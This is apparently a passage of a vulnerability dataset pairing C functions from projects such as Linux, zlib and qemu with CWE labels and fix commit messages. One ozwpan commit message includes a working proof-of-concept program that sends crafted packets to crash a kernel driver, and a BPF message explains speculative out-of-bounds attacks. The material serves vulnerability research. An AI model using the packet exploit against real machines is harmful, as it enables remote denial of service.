"CWE-20"
] |
linux
|
ee9c4e681ec4f58e42a83cb0c22a0289ade1aacf
| 328,180,809,027,078,020,000,000,000,000,000,000,000 | 5 |
drm/vmwgfx: limit the number of mip levels in vmw_gb_surface_define_ioctl()
The 'req->mip_levels' parameter in vmw_gb_surface_define_ioctl() is
a user-controlled 'uint32_t' value which is used as a loop count limit.
This can lead to a kernel lockup and DoS. Add check for 'req->mip_levels'.
References:
https://bugzilla.redhat.com/show_bug.cgi?id=1437431
Cc: <[email protected]>
Signed-off-by: Vladis Dronov <[email protected]>
Reviewed-by: Sinclair Yeh <[email protected]>
|
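A sketch of the added check, with the maximum written out as an illustrative constant (the real bound lives in the vmwgfx headers): a count taken from an ioctl argument is validated before it can become a loop limit.
#include <errno.h>
#include <stdint.h>
#define VMW_MAX_MIP_LEVELS 15   /* illustrative hardware limit */
static int check_mip_levels(uint32_t requested)
{
    if (requested == 0 || requested > VMW_MAX_MIP_LEVELS)
        return -EINVAL;         /* never loop on an unchecked user value */
    return 0;
}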
static struct input_device *input_device_new(struct btd_service *service)
{
struct btd_device *device = btd_service_get_device(service);
struct btd_profile *p = btd_service_get_profile(service);
const char *path = device_get_path(device);
const sdp_record_t *rec = btd_device_get_record(device, p->remote_uuid);
struct btd_adapter *adapter = device_get_adapter(device);
struct input_device *idev;
if (!rec)
return NULL;
idev = g_new0(struct input_device, 1);
bacpy(&idev->src, btd_adapter_get_address(adapter));
bacpy(&idev->dst, device_get_address(device));
idev->service = btd_service_ref(service);
idev->device = btd_device_ref(device);
idev->path = g_strdup(path);
idev->handle = rec->handle;
idev->disable_sdp = is_device_sdp_disable(rec);
/* Initialize device properties */
extract_hid_props(idev, rec);
return idev;
}
| 0 |
[] |
bluez
|
3cccdbab2324086588df4ccf5f892fb3ce1f1787
| 185,962,189,663,642,170,000,000,000,000,000,000,000 | 26 |
HID accepts bonded device connections only.
This change adds a configuration for platforms to choose a more secure
posture for the HID profile. While some older mice are known to not
support pairing or encryption, some platform may choose a more secure
posture by requiring the device to be bonded and require the
connection to be encrypted when bonding is required.
Reference:
https://www.intel.com/content/www/us/en/security-center/advisory/intel-sa-00352.html
|
static int imap_mbox_open_append(struct Mailbox *m, OpenMailboxFlags flags)
{
if (!m || !m->account)
return -1;
/* in APPEND mode, we appear to hijack an existing IMAP connection -
* ctx is brand new and mostly empty */
struct ImapAccountData *adata = imap_adata_get(m);
struct ImapMboxData *mdata = imap_mdata_get(m);
int rc = imap_mailbox_status(m, false);
if (rc >= 0)
return 0;
if (rc == -1)
return -1;
char buf[PATH_MAX + 64];
snprintf(buf, sizeof(buf), _("Create %s?"), mdata->name);
if (C_Confirmcreate && (mutt_yesorno(buf, MUTT_YES) != MUTT_YES))
return -1;
if (imap_create_mailbox(adata, mdata->name) < 0)
return -1;
return 0;
}
| 0 |
[
"CWE-94",
"CWE-74"
] |
neomutt
|
fb013ec666759cb8a9e294347c7b4c1f597639cc
| 236,214,489,535,406,820,000,000,000,000,000,000,000 | 26 |
tls: clear data after a starttls acknowledgement
After a starttls acknowledgement message, clear the buffers of any
incoming data / commands. This will ensure that all future data is
handled securely.
Co-authored-by: Pietro Cerutti <[email protected]>
|
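A sketch of the defence the message describes, with an invented buffer layout: on the STARTTLS acknowledgement, everything still buffered from the plaintext phase is wiped before the TLS handshake begins, so attacker-injected bytes cannot be parsed as the first "protected" responses.
#include <string.h>
struct conn_buf {
    char data[4096];
    size_t len;                 /* bytes buffered but not yet consumed */
    size_t pos;                 /* read cursor */
};
static void on_starttls_ack(struct conn_buf *in)
{
    memset(in->data, 0, sizeof(in->data));   /* drop pre-TLS leftovers */
    in->len = 0;
    in->pos = 0;
    /* ...then hand the raw socket to the TLS layer. */
}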
local void fill_window(s)
deflate_state *s;
{
unsigned n;
unsigned more; /* Amount of free space at the end of the window. */
uInt wsize = s->w_size;
Assert(s->lookahead < MIN_LOOKAHEAD, "already enough lookahead");
do {
more = (unsigned)(s->window_size -(ulg)s->lookahead -(ulg)s->strstart);
/* Deal with !@#$% 64K limit: */
if (sizeof(int) <= 2) {
if (more == 0 && s->strstart == 0 && s->lookahead == 0) {
more = wsize;
} else if (more == (unsigned)(-1)) {
/* Very unlikely, but possible on 16 bit machine if
* strstart == 0 && lookahead == 1 (input done a byte at time)
*/
more--;
}
}
/* If the window is almost full and there is insufficient lookahead,
* move the upper half to the lower one to make room in the upper half.
*/
if (s->strstart >= wsize+MAX_DIST(s)) {
zmemcpy(s->window, s->window+wsize, (unsigned)wsize - more);
s->match_start -= wsize;
s->strstart -= wsize; /* we now have strstart >= MAX_DIST */
s->block_start -= (long) wsize;
if (s->insert > s->strstart)
s->insert = s->strstart;
slide_hash(s);
more += wsize;
}
if (s->strm->avail_in == 0) break;
/* If there was no sliding:
* strstart <= WSIZE+MAX_DIST-1 && lookahead <= MIN_LOOKAHEAD - 1 &&
* more == window_size - lookahead - strstart
* => more >= window_size - (MIN_LOOKAHEAD-1 + WSIZE + MAX_DIST-1)
* => more >= window_size - 2*WSIZE + 2
* In the BIG_MEM or MMAP case (not yet supported),
* window_size == input_size + MIN_LOOKAHEAD &&
* strstart + s->lookahead <= input_size => more >= MIN_LOOKAHEAD.
* Otherwise, window_size == 2*WSIZE so more >= 2.
* If there was sliding, more >= WSIZE. So in all cases, more >= 2.
*/
Assert(more >= 2, "more < 2");
n = read_buf(s->strm, s->window + s->strstart + s->lookahead, more);
s->lookahead += n;
/* Initialize the hash value now that we have some input: */
if (s->lookahead + s->insert >= MIN_MATCH) {
uInt str = s->strstart - s->insert;
s->ins_h = s->window[str];
UPDATE_HASH(s, s->ins_h, s->window[str + 1]);
#if MIN_MATCH != 3
Call UPDATE_HASH() MIN_MATCH-3 more times
#endif
while (s->insert) {
UPDATE_HASH(s, s->ins_h, s->window[str + MIN_MATCH-1]);
#ifndef FASTEST
s->prev[str & s->w_mask] = s->head[s->ins_h];
#endif
s->head[s->ins_h] = (Pos)str;
str++;
s->insert--;
if (s->lookahead + s->insert < MIN_MATCH)
break;
}
}
/* If the whole input has less than MIN_MATCH bytes, ins_h is garbage,
* but this is not important since only literal bytes will be emitted.
*/
} while (s->lookahead < MIN_LOOKAHEAD && s->strm->avail_in != 0);
/* If the WIN_INIT bytes after the end of the current data have never been
* written, then zero those bytes in order to avoid memory check reports of
* the use of uninitialized (or uninitialised as Julian writes) bytes by
* the longest match routines. Update the high water mark for the next
* time through here. WIN_INIT is set to MAX_MATCH since the longest match
* routines allow scanning to strstart + MAX_MATCH, ignoring lookahead.
*/
if (s->high_water < s->window_size) {
ulg curr = s->strstart + (ulg)(s->lookahead);
ulg init;
if (s->high_water < curr) {
/* Previous high water mark below current data -- zero WIN_INIT
* bytes or up to end of window, whichever is less.
*/
init = s->window_size - curr;
if (init > WIN_INIT)
init = WIN_INIT;
zmemzero(s->window + curr, (unsigned)init);
s->high_water = curr + init;
}
else if (s->high_water < (ulg)curr + WIN_INIT) {
/* High water mark at or above current data, but below current data
* plus WIN_INIT -- zero out to current data plus WIN_INIT, or up
* to end of window, whichever is less.
*/
init = (ulg)curr + WIN_INIT - s->high_water;
if (init > s->window_size - s->high_water)
init = s->window_size - s->high_water;
zmemzero(s->window + s->high_water, (unsigned)init);
s->high_water += init;
}
}
Assert((ulg)s->strstart <= s->window_size - MIN_LOOKAHEAD,
"not enough room for search");
}
| 0 |
[
"CWE-284",
"CWE-787"
] |
zlib
|
5c44459c3b28a9bd3283aaceab7c615f8020c531
| 273,267,894,767,552,230,000,000,000,000,000,000,000 | 120 |
Fix a bug that can crash deflate on some input when using Z_FIXED.
This bug was reported by Danilo Ramos of Eideticom, Inc. It has
lain in wait 13 years before being found! The bug was introduced
in zlib 1.2.2.2, with the addition of the Z_FIXED option. That
option forces the use of fixed Huffman codes. For rare inputs with
a large number of distant matches, the pending buffer into which
the compressed data is written can overwrite the distance symbol
table which it overlays. That results in corrupted output due to
invalid distances, and can result in out-of-bound accesses,
crashing the application.
The fix here combines the distance buffer and literal/length
buffers into a single symbol buffer. Now three bytes of pending
buffer space are opened up for each literal or length/distance
pair consumed, instead of the previous two bytes. This assures
that the pending buffer cannot overwrite the symbol table, since
the maximum fixed code compressed length/distance is 31 bits, and
since there are four bytes of pending space for every three bytes
of symbol space.
|
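A quick sanity check of the space argument above (our own arithmetic, not part of the patch): each symbol record occupies three bytes, its worst-case fixed-code output is 31 bits, and four bytes of pending space open up per symbol, so the output can never catch up with the symbol table.

#include <assert.h>

int main(void)
{
    const int max_out_bits    = 31; /* worst-case fixed length/distance code */
    const int pending_per_sym = 4;  /* bytes freed per 3-byte symbol record */

    /* 31 bits round up to 4 output bytes, which is covered by the
     * 4 bytes of pending space opened for every symbol consumed. */
    assert((max_out_bits + 7) / 8 <= pending_per_sym);
    return 0;
}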
SecureElementStatus_t SecureElementRandomNumber( uint32_t* randomNum )
{
if( randomNum == NULL )
{
return SECURE_ELEMENT_ERROR_NPE;
}
*randomNum = SoftSeHalGetRandomNumber( );
return SECURE_ELEMENT_SUCCESS;
}
| 0 |
[
"CWE-120",
"CWE-787"
] |
LoRaMac-node
|
e3063a91daa7ad8a687223efa63079f0c24568e4
| 51,378,493,125,750,230,000,000,000,000,000,000,000 | 9 |
Added received buffer size checks.
|
static void oz_hcd_clear_orphanage(struct oz_hcd *ozhcd, int status)
{
if (ozhcd) {
struct oz_urb_link *urbl, *n;
list_for_each_entry_safe(urbl, n, &ozhcd->orphanage, link) {
list_del(&urbl->link);
oz_complete_urb(ozhcd->hcd, urbl->urb, status);
oz_free_urb_link(urbl);
}
}
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
b1bb5b49373b61bf9d2c73a4d30058ba6f069e4c
| 124,029,465,584,536,600,000,000,000,000,000,000,000 | 12 |
ozwpan: Use unsigned ints to prevent heap overflow
Using signed integers, the subtraction between required_size and offset
could wind up being negative, resulting in a memcpy into a heap buffer
with a negative length, resulting in huge amounts of network-supplied
data being copied into the heap, which could potentially lead to remote
code execution. This is remotely triggerable with a magic packet.
A PoC which obtains DoS follows below. It requires the ozprotocol.h file
from this module.
=-=-=-=-=-=
#include <arpa/inet.h>
#include <linux/if_packet.h>
#include <net/if.h>
#include <netinet/ether.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <endian.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#define u8 uint8_t
#define u16 uint16_t
#define u32 uint32_t
#define __packed __attribute__((__packed__))
#include "ozprotocol.h"
static int hex2num(char c)
{
if (c >= '0' && c <= '9')
return c - '0';
if (c >= 'a' && c <= 'f')
return c - 'a' + 10;
if (c >= 'A' && c <= 'F')
return c - 'A' + 10;
return -1;
}
static int hwaddr_aton(const char *txt, uint8_t *addr)
{
int i;
for (i = 0; i < 6; i++) {
int a, b;
a = hex2num(*txt++);
if (a < 0)
return -1;
b = hex2num(*txt++);
if (b < 0)
return -1;
*addr++ = (a << 4) | b;
if (i < 5 && *txt++ != ':')
return -1;
}
return 0;
}
int main(int argc, char *argv[])
{
if (argc < 3) {
fprintf(stderr, "Usage: %s interface destination_mac\n", argv[0]);
return 1;
}
uint8_t dest_mac[6];
if (hwaddr_aton(argv[2], dest_mac)) {
fprintf(stderr, "Invalid mac address.\n");
return 1;
}
int sockfd = socket(AF_PACKET, SOCK_RAW, IPPROTO_RAW);
if (sockfd < 0) {
perror("socket");
return 1;
}
struct ifreq if_idx;
int interface_index;
strncpy(if_idx.ifr_ifrn.ifrn_name, argv[1], IFNAMSIZ - 1);
if (ioctl(sockfd, SIOCGIFINDEX, &if_idx) < 0) {
perror("SIOCGIFINDEX");
return 1;
}
interface_index = if_idx.ifr_ifindex;
if (ioctl(sockfd, SIOCGIFHWADDR, &if_idx) < 0) {
perror("SIOCGIFHWADDR");
return 1;
}
uint8_t *src_mac = (uint8_t *)&if_idx.ifr_hwaddr.sa_data;
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_elt_connect_req oz_elt_connect_req;
} __packed connect_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(0)
},
.oz_elt = {
.type = OZ_ELT_CONNECT_REQ,
.length = sizeof(struct oz_elt_connect_req)
},
.oz_elt_connect_req = {
.mode = 0,
.resv1 = {0},
.pd_info = 0,
.session_id = 0,
.presleep = 35,
.ms_isoc_latency = 0,
.host_vendor = 0,
.keep_alive = 0,
.apps = htole16((1 << OZ_APPID_USB) | 0x1),
.max_len_div16 = 0,
.ms_per_isoc = 0,
.up_audio_buf = 0,
.ms_per_elt = 0
}
};
struct {
struct ether_header ether_header;
struct oz_hdr oz_hdr;
struct oz_elt oz_elt;
struct oz_get_desc_rsp oz_get_desc_rsp;
} __packed pwn_packet = {
.ether_header = {
.ether_type = htons(OZ_ETHERTYPE),
.ether_shost = { src_mac[0], src_mac[1], src_mac[2], src_mac[3], src_mac[4], src_mac[5] },
.ether_dhost = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
},
.oz_hdr = {
.control = OZ_F_ACK_REQUESTED | (OZ_PROTOCOL_VERSION << OZ_VERSION_SHIFT),
.last_pkt_num = 0,
.pkt_num = htole32(1)
},
.oz_elt = {
.type = OZ_ELT_APP_DATA,
.length = sizeof(struct oz_get_desc_rsp)
},
.oz_get_desc_rsp = {
.app_id = OZ_APPID_USB,
.elt_seq_num = 0,
.type = OZ_GET_DESC_RSP,
.req_id = 0,
.offset = htole16(2),
.total_size = htole16(1),
.rcode = 0,
.data = {0}
}
};
struct sockaddr_ll socket_address = {
.sll_ifindex = interface_index,
.sll_halen = ETH_ALEN,
.sll_addr = { dest_mac[0], dest_mac[1], dest_mac[2], dest_mac[3], dest_mac[4], dest_mac[5] }
};
if (sendto(sockfd, &connect_packet, sizeof(connect_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
usleep(300000);
if (sendto(sockfd, &pwn_packet, sizeof(pwn_packet), 0, (struct sockaddr *)&socket_address, sizeof(socket_address)) < 0) {
perror("sendto");
return 1;
}
return 0;
}
Signed-off-by: Jason A. Donenfeld <[email protected]>
Acked-by: Dan Carpenter <[email protected]>
Cc: stable <[email protected]>
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
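A self-contained demonstration of the bug class described above (generic C, not the ozwpan code): a signed subtraction goes negative and becomes an enormous length once it reaches a size_t parameter such as memcpy's.

#include <stdio.h>
#include <stddef.h>

int main(void)
{
    int required_size = 1;                 /* attacker-influenced */
    int offset        = 2;                 /* attacker-influenced */
    int len = required_size - offset;      /* -1 with signed math */

    /* Passed to memcpy(dst, src, len), this wraps to SIZE_MAX. */
    printf("len as size_t: %zu\n", (size_t)len);
    return 0;
}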
void topology_set_thermal_pressure(const struct cpumask *cpus,
unsigned long th_pressure)
{
int cpu;
for_each_cpu(cpu, cpus)
WRITE_ONCE(per_cpu(thermal_pressure, cpu), th_pressure);
}
| 0 |
[
"CWE-787"
] |
linux
|
aa838896d87af561a33ecefea1caa4c15a68bc47
| 268,566,893,496,510,670,000,000,000,000,000,000,000 | 8 |
drivers core: Use sysfs_emit and sysfs_emit_at for show(device *...) functions
Convert the various sprintf family calls in sysfs device show functions
to sysfs_emit and sysfs_emit_at for PAGE_SIZE buffer safety.
Done with:
$ spatch -sp-file sysfs_emit_dev.cocci --in-place --max-width=80 .
And cocci script:
$ cat sysfs_emit_dev.cocci
@@
identifier d_show;
identifier dev, attr, buf;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- sprintf(buf,
+ sysfs_emit(buf,
...);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- snprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- scnprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
expression chr;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
return
- strcpy(buf, chr);
+ sysfs_emit(buf, chr);
...>
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
len =
- sprintf(buf,
+ sysfs_emit(buf,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
len =
- snprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
len =
- scnprintf(buf, PAGE_SIZE,
+ sysfs_emit(buf,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
identifier len;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
<...
- len += scnprintf(buf + len, PAGE_SIZE - len,
+ len += sysfs_emit_at(buf, len,
...);
...>
return len;
}
@@
identifier d_show;
identifier dev, attr, buf;
expression chr;
@@
ssize_t d_show(struct device *dev, struct device_attribute *attr, char *buf)
{
...
- strcpy(buf, chr);
- return strlen(buf);
+ return sysfs_emit(buf, chr);
}
Signed-off-by: Joe Perches <[email protected]>
Link: https://lore.kernel.org/r/3d033c33056d88bbe34d4ddb62afd05ee166ab9a.1600285923.git.joe@perches.com
Signed-off-by: Greg Kroah-Hartman <[email protected]>
|
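For illustration, the shape of one such conversion (a made-up attribute, not taken from the patch; kernel-style sketch, builds only in-tree): sysfs_emit() bounds the write to PAGE_SIZE, which the bare sprintf() did not.

/* Before the conversion:
 *     return sprintf(buf, "%d\n", value);
 * After: */
static ssize_t foo_show(struct device *dev,
                        struct device_attribute *attr, char *buf)
{
    return sysfs_emit(buf, "%d\n", 42);  /* PAGE_SIZE-safe */
}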
void *genlmsg_put(struct sk_buff *skb, u32 portid, u32 seq,
const struct genl_family *family, int flags, u8 cmd)
{
struct nlmsghdr *nlh;
struct genlmsghdr *hdr;
nlh = nlmsg_put(skb, portid, seq, family->id, GENL_HDRLEN +
family->hdrsize, flags);
if (nlh == NULL)
return NULL;
hdr = nlmsg_data(nlh);
hdr->cmd = cmd;
hdr->version = family->version;
hdr->reserved = 0;
return (char *) hdr + GENL_HDRLEN;
}
| 0 |
[
"CWE-399",
"CWE-401"
] |
linux
|
ceabee6c59943bdd5e1da1a6a20dc7ee5f8113a2
| 51,053,124,899,783,490,000,000,000,000,000,000,000 | 18 |
genetlink: Fix a memory leak on error path
In genl_register_family(), when idr_alloc() fails,
we forget to free the memory we possibly allocate for
family->attrbuf.
Reported-by: Hulk Robot <[email protected]>
Fixes: 2ae0f17df1cd ("genetlink: use idr to track families")
Signed-off-by: YueHaibing <[email protected]>
Reviewed-by: Kirill Tkhai <[email protected]>
Signed-off-by: David S. Miller <[email protected]>
|
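A user-space analogue of the leak pattern (illustrative names, not the genetlink code): every allocation made earlier in a function must be released when a later step fails.

#include <stdlib.h>

struct family { void *attrbuf; };

static int register_family(struct family *fam, size_t n, int idr_ok)
{
    fam->attrbuf = malloc(n);
    if (fam->attrbuf == NULL)
        return -1;

    if (!idr_ok) {                 /* stand-in for idr_alloc() failing */
        free(fam->attrbuf);        /* the free the original code forgot */
        fam->attrbuf = NULL;
        return -1;
    }
    return 0;
}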
static int _assign_xshm(Display *dpy, XErrorEvent *error) {
cimg::unused(dpy,error);
cimg::X11_attr().is_shm_enabled = false;
    return 0;
}
| 0 |
[
"CWE-125"
] |
CImg
|
10af1e8c1ad2a58a0a3342a856bae63e8f257abb
| 126,894,120,012,542,270,000,000,000,000,000,000,000 | 5 |
Fix other issues in 'CImg<T>::load_bmp()'.
|
void MonClient::handle_config(MConfig *m)
{
ldout(cct,10) << __func__ << " " << *m << dendl;
finisher.queue(new LambdaContext([this, m](int r) {
cct->_conf.set_mon_vals(cct, m->config, config_cb);
if (config_notify_cb) {
config_notify_cb();
}
m->put();
}));
got_config = true;
map_cond.notify_all();
}
| 0 |
[
"CWE-294"
] |
ceph
|
6c14c2fb5650426285428dfe6ca1597e5ea1d07d
| 53,731,759,576,434,030,000,000,000,000,000,000,000 | 13 |
mon/MonClient: bring back CEPHX_V2 authorizer challenges
Commit c58c5754dfd2 ("msg/async/ProtocolV1: use AuthServer and
AuthClient") introduced a backwards compatibility issue into msgr1.
To fix it, commit 321548010578 ("mon/MonClient: skip CEPHX_V2
challenge if client doesn't support it") set out to skip authorizer
challenges for peers that don't support CEPHX_V2. However, it
made it so that authorizer challenges are skipped for all peers in
both msgr1 and msgr2 cases, effectively disabling the protection
against replay attacks that was put in place in commit f80b848d3f83
("auth/cephx: add authorizer challenge", CVE-2018-1128).
This is because con->get_features() always returns 0 at that
point. In msgr1 case, the peer shares its features along with the
authorizer, but while they are available in connect_msg.features they
aren't assigned to con until ProtocolV1::open(). In msgr2 case, the
peer doesn't share its features until much later (in CLIENT_IDENT
frame, i.e. after the authentication phase). The result is that
!CEPHX_V2 branch is taken in all cases and replay attack protection
is lost.
Only clusters with cephx_service_require_version set to 2 on the
service daemons would not be silently downgraded. But, since the
default is 1 and there are no reports of looping on BADAUTHORIZER
faults, I'm pretty sure that no one has ever done that. Note that
cephx_require_version set to 2 would have no effect even though it
is supposed to be stronger than cephx_service_require_version
because MonClient::handle_auth_request() didn't check it.
To fix:
- for msgr1, check connect_msg.features (as was done before commit
c58c5754dfd2) and challenge if CEPHX_V2 is supported. Together
with two preceding patches that resurrect proper cephx_* option
handling in msgr1, this covers both "I want old clients to work"
and "I wish to require better authentication" use cases.
- for msgr2, don't check anything and always challenge. CEPHX_V2
predates msgr2, anyone speaking msgr2 must support it.
Signed-off-by: Ilya Dryomov <[email protected]>
(cherry picked from commit 4a82c72e3bdddcb625933e83af8b50a444b961f1)
|
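The decision the commit describes, reduced to a sketch (not Ceph's code; the feature-bit value below is a placeholder): msgr1 challenges when the peer's shared features advertise CEPHX_V2, while msgr2 always challenges.

#include <stdbool.h>
#include <stdint.h>

#define FEAT_CEPHX_V2 (1ULL << 61)   /* placeholder bit, illustrative only */

static bool should_challenge(bool is_msgr2, uint64_t peer_features)
{
    if (is_msgr2)
        return true;  /* CEPHX_V2 predates msgr2, so always challenge */
    return (peer_features & FEAT_CEPHX_V2) != 0;  /* msgr1: gate on features */
}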
GF_Err adaf_box_write(GF_Box *s, GF_BitStream *bs)
{
GF_Err e;
GF_AdobeDRMAUFormatBox *ptr = (GF_AdobeDRMAUFormatBox *) s;
if (!s) return GF_BAD_PARAM;
e = gf_isom_full_box_write(s, bs);
if (e) return e;
gf_bs_write_u8(bs, ptr->selective_enc);
gf_bs_write_u8(bs, 0x0);
gf_bs_write_u8(bs, ptr->IV_length);
return GF_OK;
}
| 0 |
[
"CWE-703"
] |
gpac
|
f19668964bf422cf5a63e4dbe1d3c6c75edadcbb
| 155,156,898,561,937,200,000,000,000,000,000,000,000 | 13 |
fixed #1879
|
static bool mg_sock_would_block(void) {
int err = MG_SOCK_ERRNO;
return err == EINPROGRESS || err == EWOULDBLOCK
#ifndef WINCE
|| err == EAGAIN || err == EINTR
#endif
#if defined(_WIN32) && MG_ENABLE_WINSOCK
|| err == WSAEINTR || err == WSAEWOULDBLOCK
#endif
;
}
| 0 |
[
"CWE-552"
] |
mongoose
|
c65c8fdaaa257e0487ab0aaae9e8f6b439335945
| 206,569,166,467,228,260,000,000,000,000,000,000,000 | 11 |
Protect against the directory traversal in mg_upload()
|
static void interface_set_mm_time(QXLInstance *sin, uint32_t mm_time)
{
PCIQXLDevice *qxl = container_of(sin, PCIQXLDevice, ssd.qxl);
if (!qemu_spice_display_is_running(&qxl->ssd)) {
return;
}
trace_qxl_interface_set_mm_time(qxl->id, mm_time);
qxl->shadow_rom.mm_clock = cpu_to_le32(mm_time);
qxl->rom->mm_clock = cpu_to_le32(mm_time);
qxl_rom_set_dirty(qxl);
}
| 0 |
[
"CWE-476"
] |
qemu
|
d52680fc932efb8a2f334cc6993e705ed1e31e99
| 320,971,296,585,096,780,000,000,000,000,000,000,000 | 13 |
qxl: check release info object
When releasing spice resources in release_resource() routine,
if release info object 'ext.info' is null, it leads to null
pointer dereference. Add check to avoid it.
Reported-by: Bugs SysSec <[email protected]>
Signed-off-by: Prasad J Pandit <[email protected]>
Message-id: [email protected]
Signed-off-by: Gerd Hoffmann <[email protected]>
|
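The shape of the fix, as a generic sketch (hypothetical types; the real code deals with SPICE release-info structures):

#include <stddef.h>

struct release_info { int id; };
struct ext          { struct release_info *info; };

static void release_resource_sketch(struct ext *ext)
{
    if (ext->info == NULL)   /* guest-supplied, so may legitimately be null */
        return;
    /* ... dereference ext->info only past this point ... */
}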
static int ZEND_FASTCALL ZEND_IS_NOT_EQUAL_SPEC_VAR_CONST_HANDLER(ZEND_OPCODE_HANDLER_ARGS)
{
zend_op *opline = EX(opline);
zend_free_op free_op1;
zval *result = &EX_T(opline->result.u.var).tmp_var;
compare_function(result,
_get_zval_ptr_var(&opline->op1, EX(Ts), &free_op1 TSRMLS_CC),
&opline->op2.u.constant TSRMLS_CC);
ZVAL_BOOL(result, (Z_LVAL_P(result) != 0));
if (free_op1.var) {zval_ptr_dtor(&free_op1.var);};
ZEND_VM_NEXT_OPCODE();
}
| 0 |
[] |
php-src
|
ce96fd6b0761d98353761bf78d5bfb55291179fd
| 227,168,183,763,719,300,000,000,000,000,000,000,000 | 14 |
- fix #39863, do not accept paths with NULL in them. See http://news.php.net/php.internals/50191, trunk will have the patch later (adding a macro and/or changing (some) APIs. Patch by Rasmus
|
static int check_packet_access(struct bpf_verifier_env *env, u32 regno, int off,
int size, bool zero_size_allowed)
{
struct bpf_reg_state *regs = cur_regs(env);
	struct bpf_reg_state *reg = &regs[regno];
int err;
/* We may have added a variable offset to the packet pointer; but any
* reg->range we have comes after that. We are only checking the fixed
* offset.
*/
/* We don't allow negative numbers, because we aren't tracking enough
* detail to prove they're safe.
*/
if (reg->smin_value < 0) {
verbose(env, "R%d min value is negative, either use unsigned index or do a if (index >=0) check.\n",
regno);
return -EACCES;
}
err = __check_packet_access(env, regno, off, size, zero_size_allowed);
if (err) {
verbose(env, "R%d offset is outside of the packet\n", regno);
return err;
}
/* __check_packet_access has made sure "off + size - 1" is within u16.
* reg->umax_value can't be bigger than MAX_PACKET_OFF which is 0xffff,
* otherwise find_good_pkt_pointers would have refused to set range info
* that __check_packet_access would have rejected this pkt access.
* Therefore, "off + reg->umax_value + size - 1" won't overflow u32.
*/
env->prog->aux->max_pkt_offset =
max_t(u32, env->prog->aux->max_pkt_offset,
off + reg->umax_value + size - 1);
return err;
}
| 0 |
[
"CWE-703",
"CWE-189"
] |
linux
|
979d63d50c0c0f7bc537bf821e056cc9fe5abd38
| 97,289,006,539,524,080,000,000,000,000,000,000,000 | 38 |
bpf: prevent out of bounds speculation on pointer arithmetic
Jann reported that the original commit back in b2157399cc98
("bpf: prevent out-of-bounds speculation") was not sufficient
to stop CPU from speculating out of bounds memory access:
While b2157399cc98 only focussed on masking array map access
for unprivileged users for tail calls and data access such
that the user provided index gets sanitized from BPF program
and syscall side, there is still a more generic form affected
from BPF programs that applies to most maps that hold user
data in relation to dynamic map access when dealing with
unknown scalars or "slow" known scalars as access offset, for
example:
- Load a map value pointer into R6
- Load an index into R7
- Do a slow computation (e.g. with a memory dependency) that
loads a limit into R8 (e.g. load the limit from a map for
high latency, then mask it to make the verifier happy)
- Exit if R7 >= R8 (mispredicted branch)
- Load R0 = R6[R7]
- Load R0 = R6[R0]
For unknown scalars there are two options in the BPF verifier
where we could derive knowledge from in order to guarantee
safe access to the memory: i) While </>/<=/>= variants won't
allow to derive any lower or upper bounds from the unknown
scalar where it would be safe to add it to the map value
pointer, it is possible through ==/!= test however. ii) another
option is to transform the unknown scalar into a known scalar,
for example, through ALU ops combination such as R &= <imm>
followed by R |= <imm> or any similar combination where the
original information from the unknown scalar would be destroyed
entirely leaving R with a constant. The initial slow load still
precedes the latter ALU ops on that register, so the CPU
executes speculatively from that point. Once we have the known
scalar, any compare operation would work then. A third option
only involving registers with known scalars could be crafted
as described in [0] where a CPU port (e.g. Slow Int unit)
would be filled with many dependent computations such that
the subsequent condition depending on its outcome has to wait
for evaluation on its execution port and thereby executing
speculatively if the speculated code can be scheduled on a
different execution port, or any other form of mistraining
as described in [1], for example. Given this is not limited
to only unknown scalars, not only map but also stack access
is affected since both is accessible for unprivileged users
and could potentially be used for out of bounds access under
speculation.
In order to prevent any of these cases, the verifier is now
sanitizing pointer arithmetic on the offset such that any
out of bounds speculation would be masked in a way where the
pointer arithmetic result in the destination register will
stay unchanged, meaning offset masked into zero similar as
in array_index_nospec() case. With regards to implementation,
there are three options that were considered: i) new insn
for sanitation, ii) push/pop insn and sanitation as inlined
BPF, iii) reuse of ax register and sanitation as inlined BPF.
Option i) has the downside that we end up using from reserved
bits in the opcode space, but also that we would require
each JIT to emit masking as native arch opcodes meaning
mitigation would have slow adoption till everyone implements
it eventually which is counter-productive. Option ii) and iii)
have both in common that a temporary register is needed in
order to implement the sanitation as inlined BPF since we
are not allowed to modify the source register. While a push /
pop insn in ii) would be useful to have in any case, it
